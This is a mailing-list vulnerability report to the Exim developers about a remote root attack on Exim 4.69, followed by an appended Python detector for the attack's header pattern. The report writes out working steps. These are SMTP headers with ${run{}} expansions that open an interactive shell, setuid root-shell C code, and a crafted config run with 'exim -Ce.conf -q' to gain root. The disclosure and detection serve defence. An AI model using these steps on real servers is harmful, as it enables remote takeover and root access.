[exim-dev] Remote root vulnerability in Exim

Author: Sergey Kononenko
To: exim-dev
CC: pkg-exim4-maintainers
Subject: [exim-dev] Remote root vulnerability in Exim

While investigating a security break-in in the network of my company, I've
captured (by tcpdump) the sequence of a successful remote root attack through
Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
didn't find the email of the current maintainer of Exim, so I've decided to
write to this mailing list. I don't want to publish all details of the
attack before the developers can investigate and fix the vulnerability.
So I ask the Exim maintainers to contact me and I will send them the complete
captured sequence of the attack.
Here I can give a brief sequence of the attack:

EHLO mail.domain.com
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>
MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
about 700000 of the same strings
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>

after that the attacker gets a shell with the id of user Debian-exim and cwd
in /var/spool/exim4.
Then he puts there a setuid file with trivial execution of a root shell:

#include <grp.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        /* drop supplementary groups, then replace the process with a shell */
        setgroups(0, NULL);
        execl("/bin/sh", "sh", NULL);
        return 1;
}

and creates another file e.conf with the following content:
spool_directory = ${run{/bin/chown
root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}

then he runs:
exim -Ce.conf -q

and gets the suid bit on /var/spool/exim4/setuid.
Everything else is trivial.

I haven't reproduced the remote part of the attack, but the escalation from
Debian-exim to root also works on exim4-daemon-light 4.72-2 from Debian Squeeze.

With best regards,
Sergey Kononenko.
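A defender-side check for the header pattern described in this message, added here as an example that is not part of the original report: it scans one message's raw header lines for Exim `${run{...}}` expansion strings, an abnormal number of header lines, and mass-repeated header values. The sample header lines are constructed and the thresholds are assumptions.

```python
"""Flag SMTP header sets that look like the captured attack: Exim ${run{...}}
expansion items smuggled into header values, and hundreds of thousands of
near-identical header lines."""
import re
from collections import Counter

# Matches an Exim "run" expansion item such as ${run{/bin/sh -c '...'}}.
RUN_EXPANSION = re.compile(r"\$\{\s*run\s*\{")

# Constructed sample modelled on the sequence quoted in the report; the
# command inside the expansion is harmless and the counts are scaled down.
SAMPLE_HEADERS = (
    ["From: alice@example.invalid", "Subject: quarterly report"]
    + ["MAILbombhdr%04d: %s" % (i, "M4iLB0mb" * 12) for i in range(1, 55)]
    + ["HeaderX: ${run{/bin/true}}"] * 2000
)


def scan_headers(lines, max_headers=1000, max_repeats=100):
    """Return findings for one message's header lines.

    max_headers and max_repeats are assumed thresholds; tune them to the
    header counts you actually see in legitimate mail.
    """
    findings = {
        "header_count": len(lines),
        "run_expansions": 0,          # header values containing ${run{
        "oversized": len(lines) > max_headers,
        "repeated_values": [],        # values repeated more than max_repeats
    }
    values = Counter()
    for line in lines:
        name, sep, value = line.partition(":")
        if not sep or not name.strip():
            continue  # continuation line or garbage, not a header start
        value = value.strip()
        if RUN_EXPANSION.search(value):
            findings["run_expansions"] += 1
        values[value] += 1
    findings["repeated_values"] = [v for v, n in values.items() if n > max_repeats]
    findings["suspicious"] = (
        findings["run_expansions"] > 0
        or findings["oversized"]
        or bool(findings["repeated_values"])
    )
    return findings


if __name__ == "__main__":
    print(scan_headers(SAMPLE_HEADERS))
```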